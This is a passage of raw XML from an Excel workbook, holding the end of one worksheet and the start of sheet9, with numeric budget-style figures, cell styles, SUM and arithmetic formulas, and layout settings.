    <row r="56" spans="1:3" ht="18.75" customHeight="1">
      <c r="A56" s="18" t="s">
        <v>755</v>
      </c>
      <c r="B56" s="3">
        <v>911.15347299999996</v>
      </c>
      <c r="C56" s="18"/>
    </row>
    <row r="57" spans="1:3" ht="18.75" customHeight="1">
      <c r="A57" s="18" t="s">
        <v>756</v>
      </c>
      <c r="B57" s="3">
        <v>204.75559999999999</v>
      </c>
      <c r="C57" s="18"/>
    </row>
    <row r="58" spans="1:3" ht="18.75" customHeight="1">
      <c r="A58" s="18" t="s">
        <v>757</v>
      </c>
      <c r="B58" s="3">
        <v>5.8</v>
      </c>
      <c r="C58" s="18"/>
    </row>
    <row r="59" spans="1:3" ht="18.75" customHeight="1">
      <c r="A59" s="18" t="s">
        <v>758</v>
      </c>
      <c r="B59" s="3">
        <v>145.99804</v>
      </c>
      <c r="C59" s="18"/>
    </row>
    <row r="60" spans="1:3" ht="18.75" customHeight="1">
      <c r="A60" s="18" t="s">
        <v>759</v>
      </c>
      <c r="B60" s="3">
        <v>485.19515000000001</v>
      </c>
      <c r="C60" s="18"/>
    </row>
    <row r="61" spans="1:3" ht="18.75" customHeight="1">
      <c r="A61" s="18" t="s">
        <v>760</v>
      </c>
      <c r="B61" s="3">
        <v>1264.3062609999999</v>
      </c>
      <c r="C61" s="18"/>
    </row>
    <row r="62" spans="1:3" ht="18.75" customHeight="1">
      <c r="A62" s="18" t="s">
        <v>761</v>
      </c>
      <c r="B62" s="3">
        <v>462.004572</v>
      </c>
      <c r="C62" s="18"/>
    </row>
    <row r="63" spans="1:3" ht="18.75" customHeight="1">
      <c r="A63" s="18" t="s">
        <v>762</v>
      </c>
      <c r="B63" s="3">
        <v>10.7996</v>
      </c>
      <c r="C63" s="18"/>
    </row>
    <row r="64" spans="1:3" ht="18.75" customHeight="1">
      <c r="A64" s="18" t="s">
        <v>763</v>
      </c>
      <c r="B64" s="3">
        <v>10.961639999999999</v>
      </c>
      <c r="C64" s="18"/>
    </row>
    <row r="65" spans="1:3" ht="18.75" customHeight="1">
      <c r="A65" s="18" t="s">
        <v>764</v>
      </c>
      <c r="B65" s="3">
        <v>2.2999999999999998</v>
      </c>
      <c r="C65" s="18"/>
    </row>
    <row r="66" spans="1:3" ht="18.75" customHeight="1">
      <c r="A66" s="18" t="s">
        <v>765</v>
      </c>
      <c r="B66" s="3">
        <v>14.72</v>
      </c>
      <c r="C66" s="18"/>
    </row>
    <row r="67" spans="1:3" ht="18.75" customHeight="1">
      <c r="A67" s="18" t="s">
        <v>766</v>
      </c>
      <c r="B67" s="3">
        <v>79.083869000000007</v>
      </c>
      <c r="C67" s="18"/>
    </row>
    <row r="68" spans="1:3" ht="18.75" customHeight="1">
      <c r="A68" s="18" t="s">
        <v>767</v>
      </c>
      <c r="B68" s="3">
        <v>99.976900000000001</v>
      </c>
      <c r="C68" s="18"/>
    </row>
    <row r="69" spans="1:3" ht="18.75" customHeight="1">
      <c r="A69" s="18" t="s">
        <v>768</v>
      </c>
      <c r="B69" s="3">
        <v>324.85750999999999</v>
      </c>
      <c r="C69" s="18"/>
    </row>
    <row r="70" spans="1:3" ht="18.75" customHeight="1">
      <c r="A70" s="18" t="s">
        <v>769</v>
      </c>
      <c r="B70" s="3">
        <v>0.15</v>
      </c>
      <c r="C70" s="18"/>
    </row>
    <row r="71" spans="1:3" ht="18.75" customHeight="1">
      <c r="A71" s="18" t="s">
        <v>770</v>
      </c>
      <c r="B71" s="3">
        <v>400</v>
      </c>
      <c r="C71" s="18"/>
    </row>
    <row r="72" spans="1:3" ht="18.75" customHeight="1">
      <c r="A72" s="18" t="s">
        <v>771</v>
      </c>
      <c r="B72" s="3">
        <v>5</v>
      </c>
      <c r="C72" s="18"/>
    </row>
    <row r="73" spans="1:3" ht="18.75" customHeight="1">
      <c r="A73" s="18" t="s">
        <v>772</v>
      </c>
      <c r="B73" s="3">
        <v>1911.827452</v>
      </c>
      <c r="C73" s="18"/>
    </row>
    <row r="74" spans="1:3" ht="18.75" customHeight="1">
      <c r="A74" s="18" t="s">
        <v>773</v>
      </c>
      <c r="B74" s="3">
        <v>798.3963</v>
      </c>
      <c r="C74" s="18"/>
    </row>
    <row r="75" spans="1:3" ht="18.75" customHeight="1">
      <c r="A75" s="18" t="s">
        <v>774</v>
      </c>
      <c r="B75" s="3">
        <v>604.39131299999997</v>
      </c>
      <c r="C75" s="18"/>
    </row>
    <row r="76" spans="1:3" ht="18.75" customHeight="1">
      <c r="A76" s="18" t="s">
        <v>775</v>
      </c>
      <c r="B76" s="3">
        <v>55.023136999999998</v>
      </c>
      <c r="C76" s="18"/>
    </row>
    <row r="77" spans="1:3" ht="18.75" customHeight="1">
      <c r="A77" s="18" t="s">
        <v>776</v>
      </c>
      <c r="B77" s="3">
        <v>44.197510000000001</v>
      </c>
      <c r="C77" s="18"/>
    </row>
    <row r="78" spans="1:3" ht="18.75" customHeight="1">
      <c r="A78" s="18" t="s">
        <v>777</v>
      </c>
      <c r="B78" s="3">
        <v>2027.645563</v>
      </c>
      <c r="C78" s="18"/>
    </row>
    <row r="79" spans="1:3" ht="18.75" customHeight="1">
      <c r="A79" s="18" t="s">
        <v>529</v>
      </c>
      <c r="B79" s="3">
        <v>18204.857110000001</v>
      </c>
      <c r="C79" s="18"/>
    </row>
    <row r="80" spans="1:3" ht="18.75" customHeight="1">
      <c r="A80" s="18" t="s">
        <v>778</v>
      </c>
      <c r="B80" s="3">
        <v>15.668900000000001</v>
      </c>
      <c r="C80" s="18"/>
    </row>
  </sheetData>
  <autoFilter ref="A4:G80"/>
  <mergeCells count="1">
    <mergeCell ref="A2:C2"/>
  </mergeCells>
  <phoneticPr fontId="10" type="noConversion"/>
  <printOptions horizontalCentered="1"/>
  <pageMargins left="0.75" right="0.75" top="0.97916666666666696" bottom="0.97916666666666696" header="0.50902777777777797" footer="0.50902777777777797"/>
  <pageSetup paperSize="9" orientation="portrait"/>
  <headerFooter alignWithMargins="0"/>
</worksheet>
</file>

<file path=xl/worksheets/sheet9.xml><?xml version="1.0" encoding="utf-8"?>
<worksheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships">
  <sheetPr>
    <tabColor theme="4"/>
  </sheetPr>
  <dimension ref="A1:J173"/>
  <sheetViews>
    <sheetView showZeros="0" workbookViewId="0">
      <pane xSplit="3" ySplit="4" topLeftCell="D107" activePane="bottomRight" state="frozen"/>
      <selection pane="topRight"/>
      <selection pane="bottomLeft"/>
      <selection pane="bottomRight" activeCell="E125" sqref="E125"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultColWidth="8.75" defaultRowHeight="14.25"/>
  <cols>
    <col min="1" max="1" width="9" hidden="1" customWidth="1"/>
    <col min="2" max="2" width="72.125" customWidth="1"/>
    <col min="3" max="3" width="24.375" customWidth="1"/>
    <col min="4" max="4" width="14.125" style="49" customWidth="1"/>
    <col min="5" max="5" width="19.25" customWidth="1"/>
    <col min="6" max="6" width="8" hidden="1" customWidth="1"/>
    <col min="7" max="7" width="10.75" hidden="1" customWidth="1"/>
    <col min="8" max="8" width="11.375" hidden="1" customWidth="1"/>
    <col min="9" max="9" width="7.5" hidden="1" customWidth="1"/>
    <col min="10" max="29" width="9" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:10">
      <c r="B1" s="2" t="s">
        <v>398</v>
      </c>
    </row>
    <row r="2" spans="1:10" ht="20.25">
      <c r="B2" s="63" t="s">
        <v>802</v>
      </c>
      <c r="C2" s="63"/>
      <c r="D2" s="63"/>
      <c r="E2" s="63"/>
    </row>
    <row r="3" spans="1:10">
      <c r="E3" s="70" t="s">
        <v>0</v>
      </c>
      <c r="F3" s="70"/>
    </row>
    <row r="4" spans="1:10" ht="28.5">
      <c r="B4" s="1" t="s">
        <v>399</v>
      </c>
      <c r="C4" s="1" t="s">
        <v>174</v>
      </c>
      <c r="D4" s="51" t="s">
        <v>396</v>
      </c>
      <c r="E4" s="1" t="s">
        <v>400</v>
      </c>
      <c r="F4" s="1" t="s">
        <v>401</v>
      </c>
      <c r="G4" s="1" t="s">
        <v>402</v>
      </c>
      <c r="H4" s="1" t="s">
        <v>403</v>
      </c>
      <c r="I4" s="1"/>
    </row>
    <row r="5" spans="1:10" s="55" customFormat="1" ht="20.25">
      <c r="A5"/>
      <c r="B5" s="53" t="s">
        <v>404</v>
      </c>
      <c r="C5" s="53"/>
      <c r="D5" s="54">
        <v>100542.772624</v>
      </c>
      <c r="E5" s="53"/>
      <c r="F5" s="1">
        <f>F6+F55+F64+F70+F80+F85+F91+F98+F111+F120+F141+F148+F167+F170</f>
        <v>5816.36</v>
      </c>
      <c r="G5" s="1">
        <v>63467</v>
      </c>
      <c r="H5" s="1">
        <f>H6+H55+H64+H70+H80+H85+H91+H98+H111+H120+H141+H148+H167+H170+20000</f>
        <v>78393.766277000002</v>
      </c>
      <c r="I5" s="1"/>
    </row>
    <row r="6" spans="1:10" s="55" customFormat="1" ht="20.25">
      <c r="A6"/>
      <c r="B6" s="53" t="s">
        <v>185</v>
      </c>
      <c r="C6" s="53"/>
      <c r="D6" s="54">
        <v>12205.667100000001</v>
      </c>
      <c r="E6" s="53">
        <f t="shared" ref="E6:H6" si="0">SUM(E7:E54)</f>
        <v>0</v>
      </c>
      <c r="F6" s="1">
        <f t="shared" si="0"/>
        <v>307</v>
      </c>
      <c r="G6" s="1">
        <f t="shared" si="0"/>
        <v>2035.48</v>
      </c>
      <c r="H6" s="1">
        <f t="shared" si="0"/>
        <v>5443.3</v>
      </c>
      <c r="I6" s="1"/>
    </row>
    <row r="7" spans="1:10" ht="42.75">
      <c r="A7">
        <v>201</v>
      </c>
      <c r="B7" s="1" t="s">
        <v>405</v>
      </c>
      <c r="C7" s="1" t="s">
        <v>188</v>
      </c>
      <c r="D7" s="51">
        <v>174.36</v>
      </c>
      <c r="E7" s="1"/>
      <c r="F7" s="1"/>
      <c r="G7" s="1"/>
      <c r="H7" s="1">
        <f>727.47-317</f>
        <v>410.47</v>
      </c>
      <c r="I7" s="1"/>
    </row>
    <row r="8" spans="1:10" ht="42.75">
      <c r="A8">
        <v>201</v>
      </c>
      <c r="B8" s="1" t="s">
        <v>406</v>
      </c>
      <c r="C8" s="1" t="s">
        <v>190</v>
      </c>
      <c r="D8" s="51">
        <v>297.7389</v>
      </c>
      <c r="E8" s="1"/>
      <c r="F8" s="1"/>
      <c r="G8" s="1"/>
      <c r="H8" s="1">
        <f>543.95-275</f>
        <v>268.95000000000005</v>
      </c>
      <c r="I8" s="1"/>
      <c r="J8" t="s">
        <v>407</v>
      </c>
    </row>
    <row r="9" spans="1:10" ht="57">
      <c r="A9">
        <v>201</v>
      </c>
      <c r="B9" s="1" t="s">
        <v>408</v>
      </c>
      <c r="C9" s="1" t="s">
        <v>192</v>
      </c>
      <c r="D9" s="51">
        <v>420.3</v>
      </c>
      <c r="E9" s="1"/>
      <c r="F9" s="1"/>
      <c r="G9" s="1"/>
      <c r="H9" s="1">
        <f>634.2-268</f>
        <v>366.20000000000005</v>
      </c>
      <c r="I9" s="1"/>
    </row>
    <row r="10" spans="1:10" ht="28.5">
      <c r="A10">
        <v>201</v>
      </c>
      <c r="B10" s="1" t="s">
        <v>409</v>
      </c>
      <c r="C10" s="1" t="s">
        <v>410</v>
      </c>
      <c r="D10" s="51">
        <v>128</v>
      </c>
      <c r="E10" s="1"/>
      <c r="F10" s="1"/>
      <c r="G10" s="1"/>
      <c r="H10" s="1">
        <v>169.9</v>
      </c>
      <c r="I10" s="1"/>
    </row>
    <row r="11" spans="1:10">
      <c r="A11">
        <v>201</v>
      </c>
      <c r="B11" s="1" t="s">
        <v>411</v>
      </c>
      <c r="C11" s="1" t="s">
        <v>194</v>
      </c>
      <c r="D11" s="51">
        <v>13</v>
      </c>
      <c r="E11" s="1"/>
      <c r="F11" s="1"/>
      <c r="G11" s="1"/>
      <c r="H11" s="1">
        <v>107.92</v>
      </c>
      <c r="I11" s="1"/>
    </row>
    <row r="12" spans="1:10">
      <c r="A12">
        <v>201</v>
      </c>
      <c r="B12" s="1" t="s">
        <v>412</v>
      </c>
      <c r="C12" s="1" t="s">
        <v>196</v>
      </c>
      <c r="D12" s="51">
        <v>23.5</v>
      </c>
      <c r="E12" s="1"/>
      <c r="F12" s="1"/>
      <c r="G12" s="1"/>
      <c r="H12" s="1">
        <v>58.85</v>
      </c>
      <c r="I12" s="1"/>
    </row>
    <row r="13" spans="1:10" ht="28.5">
      <c r="A13">
        <v>201</v>
      </c>
      <c r="B13" s="1" t="s">
        <v>413</v>
      </c>
      <c r="C13" s="1" t="s">
        <v>414</v>
      </c>
      <c r="D13" s="51">
        <v>120</v>
      </c>
      <c r="E13" s="1"/>
      <c r="F13" s="1"/>
      <c r="G13" s="1"/>
      <c r="H13" s="1">
        <v>5</v>
      </c>
      <c r="I13" s="1"/>
    </row>
    <row r="14" spans="1:10" ht="28.5">
      <c r="A14">
        <v>201</v>
      </c>
      <c r="B14" s="1" t="s">
        <v>415</v>
      </c>
      <c r="C14" s="1" t="s">
        <v>198</v>
      </c>
      <c r="D14" s="51">
        <v>59.46</v>
      </c>
      <c r="E14" s="1"/>
      <c r="F14" s="1"/>
      <c r="G14" s="1"/>
      <c r="H14" s="1">
        <v>67</v>
      </c>
      <c r="I14" s="1"/>
    </row>
    <row r="15" spans="1:10" ht="99.75">
      <c r="A15">
        <v>201</v>
      </c>
      <c r="B15" s="1" t="s">
        <v>416</v>
      </c>
      <c r="C15" s="1" t="s">
        <v>200</v>
      </c>
      <c r="D15" s="51">
        <v>286.7</v>
      </c>
      <c r="E15" s="1"/>
      <c r="F15" s="1"/>
      <c r="G15" s="1"/>
      <c r="H15" s="1">
        <v>375.86</v>
      </c>
      <c r="I15" s="1"/>
    </row>
    <row r="16" spans="1:10">
      <c r="A16">
        <v>201</v>
      </c>
      <c r="B16" s="1" t="s">
        <v>417</v>
      </c>
      <c r="C16" s="1" t="s">
        <v>202</v>
      </c>
      <c r="D16" s="51">
        <v>109.76</v>
      </c>
      <c r="E16" s="1"/>
      <c r="F16" s="1">
        <v>10</v>
      </c>
      <c r="G16" s="1">
        <v>114</v>
      </c>
      <c r="H16" s="1"/>
      <c r="I16" s="1"/>
    </row>
    <row r="17" spans="1:9" ht="28.5">
      <c r="A17">
        <v>201</v>
      </c>
      <c r="B17" s="1" t="s">
        <v>418</v>
      </c>
      <c r="C17" s="1" t="s">
        <v>206</v>
      </c>
      <c r="D17" s="51">
        <v>125.855</v>
      </c>
      <c r="E17" s="1"/>
      <c r="F17" s="1">
        <v>10</v>
      </c>
      <c r="G17" s="1">
        <v>165</v>
      </c>
      <c r="H17" s="1">
        <v>109</v>
      </c>
      <c r="I17" s="1"/>
    </row>
    <row r="18" spans="1:9" ht="42.75">
      <c r="A18">
        <v>201</v>
      </c>
      <c r="B18" s="1" t="s">
        <v>419</v>
      </c>
      <c r="C18" s="1" t="s">
        <v>210</v>
      </c>
      <c r="D18" s="51">
        <v>300.18</v>
      </c>
      <c r="E18" s="1"/>
      <c r="F18" s="1"/>
      <c r="G18" s="1">
        <v>255.98</v>
      </c>
      <c r="H18" s="1">
        <v>399.56</v>
      </c>
      <c r="I18" s="1"/>
    </row>
    <row r="19" spans="1:9">
      <c r="A19">
        <v>201</v>
      </c>
      <c r="B19" s="1" t="s">
        <v>420</v>
      </c>
      <c r="C19" s="1" t="s">
        <v>421</v>
      </c>
      <c r="D19" s="51">
        <v>7</v>
      </c>
      <c r="E19" s="1"/>
      <c r="F19" s="1">
        <v>3</v>
      </c>
      <c r="G19" s="1">
        <v>7</v>
      </c>
      <c r="H19" s="1">
        <v>8</v>
      </c>
      <c r="I19" s="1"/>
    </row>
    <row r="20" spans="1:9">
      <c r="A20">
        <v>201</v>
      </c>
      <c r="B20" s="1" t="s">
        <v>422</v>
      </c>
      <c r="C20" s="1" t="s">
        <v>208</v>
      </c>
      <c r="D20" s="51">
        <v>22</v>
      </c>
      <c r="E20" s="1"/>
      <c r="F20" s="1"/>
      <c r="G20" s="1">
        <v>25.8</v>
      </c>
      <c r="H20" s="1">
        <v>23</v>
      </c>
      <c r="I20" s="1"/>
    </row>
    <row r="21" spans="1:9" ht="28.5">
      <c r="A21">
        <v>201</v>
      </c>
      <c r="B21" s="1" t="s">
        <v>423</v>
      </c>
      <c r="C21" s="1" t="s">
        <v>424</v>
      </c>
      <c r="D21" s="51">
        <v>25.3</v>
      </c>
      <c r="E21" s="1"/>
      <c r="F21" s="1"/>
      <c r="G21" s="1">
        <v>29</v>
      </c>
      <c r="H21" s="1">
        <v>27</v>
      </c>
      <c r="I21" s="1"/>
    </row>
    <row r="22" spans="1:9" ht="28.5">
      <c r="A22">
        <v>201</v>
      </c>
      <c r="B22" s="1" t="s">
        <v>425</v>
      </c>
      <c r="C22" s="1" t="s">
        <v>426</v>
      </c>
      <c r="D22" s="51">
        <v>100</v>
      </c>
      <c r="E22" s="1"/>
      <c r="F22" s="1"/>
      <c r="G22" s="1">
        <v>18</v>
      </c>
      <c r="H22" s="1"/>
      <c r="I22" s="1"/>
    </row>
    <row r="23" spans="1:9" ht="42.75">
      <c r="A23">
        <v>201</v>
      </c>
      <c r="B23" s="1" t="s">
        <v>427</v>
      </c>
      <c r="C23" s="1" t="s">
        <v>428</v>
      </c>
      <c r="D23" s="51">
        <v>55.75</v>
      </c>
      <c r="E23" s="1"/>
      <c r="F23" s="1"/>
      <c r="G23" s="1">
        <v>28</v>
      </c>
      <c r="H23" s="1">
        <v>96.1</v>
      </c>
      <c r="I23" s="1"/>
    </row>
    <row r="24" spans="1:9">
      <c r="A24">
        <v>201</v>
      </c>
      <c r="B24" s="1" t="s">
        <v>429</v>
      </c>
      <c r="C24" s="1" t="s">
        <v>430</v>
      </c>
      <c r="D24" s="51">
        <v>184.8</v>
      </c>
      <c r="E24" s="1"/>
      <c r="F24" s="1">
        <v>30</v>
      </c>
      <c r="G24" s="1">
        <v>85</v>
      </c>
      <c r="H24" s="1">
        <v>178</v>
      </c>
      <c r="I24" s="1"/>
    </row>
    <row r="25" spans="1:9" ht="28.5">
      <c r="A25">
        <v>201</v>
      </c>
      <c r="B25" s="1" t="s">
        <v>431</v>
      </c>
      <c r="C25" s="1" t="s">
        <v>212</v>
      </c>
      <c r="D25" s="51">
        <v>84</v>
      </c>
      <c r="E25" s="1"/>
      <c r="F25" s="1"/>
      <c r="G25" s="1">
        <v>69</v>
      </c>
      <c r="H25" s="1">
        <v>144</v>
      </c>
      <c r="I25" s="1"/>
    </row>
    <row r="26" spans="1:9" ht="42.75">
      <c r="A26">
        <v>201</v>
      </c>
      <c r="B26" s="1" t="s">
        <v>432</v>
      </c>
      <c r="C26" s="1" t="s">
        <v>216</v>
      </c>
      <c r="D26" s="51">
        <v>583.22</v>
      </c>
      <c r="E26" s="1"/>
      <c r="F26" s="1"/>
      <c r="G26" s="1">
        <f>283+40+22</f>
        <v>345</v>
      </c>
      <c r="H26" s="1">
        <v>349</v>
      </c>
      <c r="I26" s="1"/>
    </row>
    <row r="27" spans="1:9">
      <c r="A27">
        <v>201</v>
      </c>
      <c r="B27" s="1" t="s">
        <v>433</v>
      </c>
      <c r="C27" s="1" t="s">
        <v>434</v>
      </c>
      <c r="D27" s="51">
        <v>66</v>
      </c>
      <c r="E27" s="1"/>
      <c r="F27" s="1"/>
      <c r="G27" s="1">
        <v>66</v>
      </c>
      <c r="H27" s="1">
        <v>66</v>
      </c>
      <c r="I27" s="1"/>
    </row>
    <row r="28" spans="1:9" ht="28.5">
      <c r="A28">
        <v>201</v>
      </c>
      <c r="B28" s="1" t="s">
        <v>435</v>
      </c>
      <c r="C28" s="1" t="s">
        <v>436</v>
      </c>
      <c r="D28" s="51">
        <v>132.30000000000001</v>
      </c>
      <c r="E28" s="1"/>
      <c r="F28" s="1"/>
      <c r="G28" s="1">
        <v>48</v>
      </c>
      <c r="H28" s="1">
        <v>74</v>
      </c>
      <c r="I28" s="1"/>
    </row>
    <row r="29" spans="1:9">
      <c r="A29">
        <v>201</v>
      </c>
      <c r="B29" s="1" t="s">
        <v>437</v>
      </c>
      <c r="C29" s="1" t="s">
        <v>438</v>
      </c>
      <c r="D29" s="51">
        <v>37</v>
      </c>
      <c r="E29" s="1"/>
      <c r="F29" s="1">
        <v>7</v>
      </c>
      <c r="G29" s="1">
        <v>37</v>
      </c>
      <c r="H29" s="1">
        <v>39</v>
      </c>
      <c r="I29" s="1"/>
    </row>
    <row r="30" spans="1:9">
      <c r="A30">
        <v>201</v>
      </c>
      <c r="B30" s="1" t="s">
        <v>439</v>
      </c>
      <c r="C30" s="1" t="s">
        <v>440</v>
      </c>
      <c r="D30" s="51">
        <v>170</v>
      </c>
      <c r="E30" s="1"/>
      <c r="F30" s="1"/>
      <c r="G30" s="1">
        <v>20</v>
      </c>
      <c r="H30" s="1">
        <v>115</v>
      </c>
      <c r="I30" s="1"/>
    </row>
    <row r="31" spans="1:9" ht="28.5">
      <c r="A31">
        <v>201</v>
      </c>
      <c r="B31" s="1" t="s">
        <v>441</v>
      </c>
      <c r="C31" s="1" t="s">
        <v>204</v>
      </c>
      <c r="D31" s="51">
        <v>63</v>
      </c>
      <c r="E31" s="1"/>
      <c r="F31" s="1">
        <v>8</v>
      </c>
      <c r="G31" s="1">
        <v>68</v>
      </c>
      <c r="H31" s="1">
        <v>90</v>
      </c>
      <c r="I31" s="1"/>
    </row>
    <row r="32" spans="1:9">
      <c r="A32">
        <v>201</v>
      </c>
      <c r="B32" s="1" t="s">
        <v>442</v>
      </c>
      <c r="C32" s="1" t="s">
        <v>214</v>
      </c>
      <c r="D32" s="51">
        <v>18</v>
      </c>
      <c r="E32" s="1"/>
      <c r="F32" s="1"/>
      <c r="G32" s="1">
        <v>11</v>
      </c>
      <c r="H32" s="1">
        <v>17</v>
      </c>
      <c r="I32" s="1"/>
    </row>
    <row r="33" spans="1:9" ht="42.75">
      <c r="A33">
        <v>201</v>
      </c>
      <c r="B33" s="1" t="s">
        <v>443</v>
      </c>
      <c r="C33" s="1" t="s">
        <v>218</v>
      </c>
      <c r="D33" s="51">
        <v>478.23</v>
      </c>
      <c r="E33" s="1"/>
      <c r="F33" s="1"/>
      <c r="G33" s="1">
        <v>233.2</v>
      </c>
      <c r="H33" s="1">
        <v>521.17999999999995</v>
      </c>
      <c r="I33" s="1"/>
    </row>
    <row r="34" spans="1:9" ht="28.5">
      <c r="A34">
        <v>201</v>
      </c>
      <c r="B34" s="1" t="s">
        <v>444</v>
      </c>
      <c r="C34" s="1" t="s">
        <v>220</v>
      </c>
      <c r="D34" s="51">
        <v>18</v>
      </c>
      <c r="E34" s="1"/>
      <c r="F34" s="1">
        <v>16</v>
      </c>
      <c r="G34" s="1">
        <v>22</v>
      </c>
      <c r="H34" s="1">
        <v>18</v>
      </c>
      <c r="I34" s="1"/>
    </row>
    <row r="35" spans="1:9" ht="28.5">
      <c r="A35">
        <v>201</v>
      </c>
      <c r="B35" s="1" t="s">
        <v>445</v>
      </c>
      <c r="C35" s="1" t="s">
        <v>222</v>
      </c>
      <c r="D35" s="51">
        <v>35.5</v>
      </c>
      <c r="E35" s="1"/>
      <c r="F35" s="1"/>
      <c r="G35" s="1">
        <v>25.5</v>
      </c>
      <c r="H35" s="1">
        <v>37</v>
      </c>
      <c r="I35" s="1"/>
    </row>
    <row r="36" spans="1:9" ht="28.5">
      <c r="A36">
        <v>201</v>
      </c>
      <c r="B36" s="1" t="s">
        <v>446</v>
      </c>
      <c r="C36" s="1" t="s">
        <v>447</v>
      </c>
      <c r="D36" s="51">
        <v>21</v>
      </c>
      <c r="E36" s="1"/>
      <c r="F36" s="1">
        <v>9</v>
      </c>
      <c r="G36" s="1">
        <v>21</v>
      </c>
      <c r="H36" s="1">
        <v>11</v>
      </c>
      <c r="I36" s="1"/>
    </row>
    <row r="37" spans="1:9" ht="28.5">
      <c r="A37">
        <v>201</v>
      </c>
      <c r="B37" s="1" t="s">
        <v>448</v>
      </c>
      <c r="C37" s="1" t="s">
        <v>449</v>
      </c>
      <c r="D37" s="51">
        <v>98</v>
      </c>
      <c r="E37" s="1"/>
      <c r="F37" s="1"/>
      <c r="G37" s="1">
        <v>108</v>
      </c>
      <c r="H37" s="1">
        <v>54</v>
      </c>
      <c r="I37" s="1"/>
    </row>
    <row r="38" spans="1:9">
      <c r="A38">
        <v>205</v>
      </c>
      <c r="B38" s="1" t="s">
        <v>450</v>
      </c>
      <c r="C38" s="1" t="s">
        <v>451</v>
      </c>
      <c r="D38" s="51">
        <v>77</v>
      </c>
      <c r="E38" s="1"/>
      <c r="F38" s="1"/>
      <c r="G38" s="1">
        <v>59</v>
      </c>
      <c r="H38" s="1">
        <v>90.8</v>
      </c>
      <c r="I38" s="1"/>
    </row>
    <row r="39" spans="1:9" ht="28.5">
      <c r="A39">
        <v>201</v>
      </c>
      <c r="B39" s="1" t="s">
        <v>452</v>
      </c>
      <c r="C39" s="1" t="s">
        <v>224</v>
      </c>
      <c r="D39" s="51">
        <v>181</v>
      </c>
      <c r="E39" s="1"/>
      <c r="F39" s="1"/>
      <c r="G39" s="1">
        <f>15+4</f>
        <v>19</v>
      </c>
      <c r="H39" s="1">
        <v>119</v>
      </c>
      <c r="I39" s="1" t="s">
        <v>453</v>
      </c>
    </row>
    <row r="40" spans="1:9" ht="42.75">
      <c r="A40">
        <v>201</v>
      </c>
      <c r="B40" s="1" t="s">
        <v>454</v>
      </c>
      <c r="C40" s="1" t="s">
        <v>455</v>
      </c>
      <c r="D40" s="51">
        <v>447.51</v>
      </c>
      <c r="E40" s="1"/>
      <c r="F40" s="1"/>
      <c r="G40" s="1">
        <v>18</v>
      </c>
      <c r="H40" s="1">
        <v>572</v>
      </c>
      <c r="I40" s="1"/>
    </row>
    <row r="41" spans="1:9" ht="28.5">
      <c r="A41">
        <v>201</v>
      </c>
      <c r="B41" s="1" t="s">
        <v>456</v>
      </c>
      <c r="C41" s="1" t="s">
        <v>457</v>
      </c>
      <c r="D41" s="51">
        <v>210</v>
      </c>
      <c r="E41" s="1"/>
      <c r="F41" s="1">
        <v>200</v>
      </c>
      <c r="G41" s="1"/>
      <c r="H41" s="1">
        <v>117.8</v>
      </c>
      <c r="I41" s="1" t="s">
        <v>458</v>
      </c>
    </row>
    <row r="42" spans="1:9">
      <c r="A42">
        <v>201</v>
      </c>
      <c r="B42" s="1" t="s">
        <v>459</v>
      </c>
      <c r="C42" s="1" t="s">
        <v>460</v>
      </c>
      <c r="D42" s="51">
        <v>4750</v>
      </c>
      <c r="E42" s="1"/>
      <c r="F42" s="1"/>
      <c r="G42" s="1"/>
      <c r="H42" s="1"/>
      <c r="I42" s="1"/>
    </row>
    <row r="43" spans="1:9">
      <c r="A43">
        <v>217</v>
      </c>
      <c r="B43" s="1" t="s">
        <v>461</v>
      </c>
      <c r="C43" s="1" t="s">
        <v>462</v>
      </c>
      <c r="D43" s="51">
        <v>50</v>
      </c>
      <c r="E43" s="1"/>
      <c r="F43" s="1"/>
      <c r="G43" s="1"/>
      <c r="H43" s="1"/>
      <c r="I43" s="1"/>
    </row>
    <row r="44" spans="1:9" ht="28.5">
      <c r="A44">
        <v>213</v>
      </c>
      <c r="B44" s="1" t="s">
        <v>463</v>
      </c>
      <c r="C44" s="1" t="s">
        <v>464</v>
      </c>
      <c r="D44" s="51">
        <v>70.040000000000006</v>
      </c>
      <c r="E44" s="1"/>
      <c r="F44" s="1"/>
      <c r="G44" s="1">
        <v>11</v>
      </c>
      <c r="H44" s="1">
        <v>56.71</v>
      </c>
      <c r="I44" s="1"/>
    </row>
    <row r="45" spans="1:9">
      <c r="A45">
        <v>201</v>
      </c>
      <c r="B45" s="1" t="s">
        <v>465</v>
      </c>
      <c r="C45" s="1" t="s">
        <v>466</v>
      </c>
      <c r="D45" s="51">
        <v>14</v>
      </c>
      <c r="E45" s="1"/>
      <c r="F45" s="1">
        <v>3</v>
      </c>
      <c r="G45" s="1">
        <v>4</v>
      </c>
      <c r="H45" s="1">
        <v>15</v>
      </c>
      <c r="I45" s="1"/>
    </row>
    <row r="46" spans="1:9" ht="28.5">
      <c r="A46">
        <v>201</v>
      </c>
      <c r="B46" s="1" t="s">
        <v>467</v>
      </c>
      <c r="C46" s="1" t="s">
        <v>468</v>
      </c>
      <c r="D46" s="51">
        <v>27</v>
      </c>
      <c r="E46" s="1"/>
      <c r="F46" s="1"/>
      <c r="G46" s="1">
        <v>16.2</v>
      </c>
      <c r="H46" s="1">
        <v>27</v>
      </c>
      <c r="I46" s="1"/>
    </row>
    <row r="47" spans="1:9">
      <c r="A47">
        <v>201</v>
      </c>
      <c r="B47" s="1" t="s">
        <v>469</v>
      </c>
      <c r="C47" s="1" t="s">
        <v>470</v>
      </c>
      <c r="D47" s="51">
        <v>20</v>
      </c>
      <c r="E47" s="1"/>
      <c r="F47" s="1"/>
      <c r="G47" s="1">
        <v>8</v>
      </c>
      <c r="H47" s="1">
        <v>14</v>
      </c>
      <c r="I47" s="1"/>
    </row>
    <row r="48" spans="1:9" ht="42.75">
      <c r="A48">
        <v>201</v>
      </c>
      <c r="B48" s="1" t="s">
        <v>471</v>
      </c>
      <c r="C48" s="1" t="s">
        <v>226</v>
      </c>
      <c r="D48" s="51">
        <v>50.3</v>
      </c>
      <c r="E48" s="1"/>
      <c r="F48" s="1"/>
      <c r="G48" s="1"/>
      <c r="H48" s="1"/>
      <c r="I48" s="1"/>
    </row>
    <row r="49" spans="1:9" ht="28.5">
      <c r="A49">
        <v>201</v>
      </c>
      <c r="B49" s="1" t="s">
        <v>472</v>
      </c>
      <c r="C49" s="1" t="s">
        <v>473</v>
      </c>
      <c r="D49" s="51">
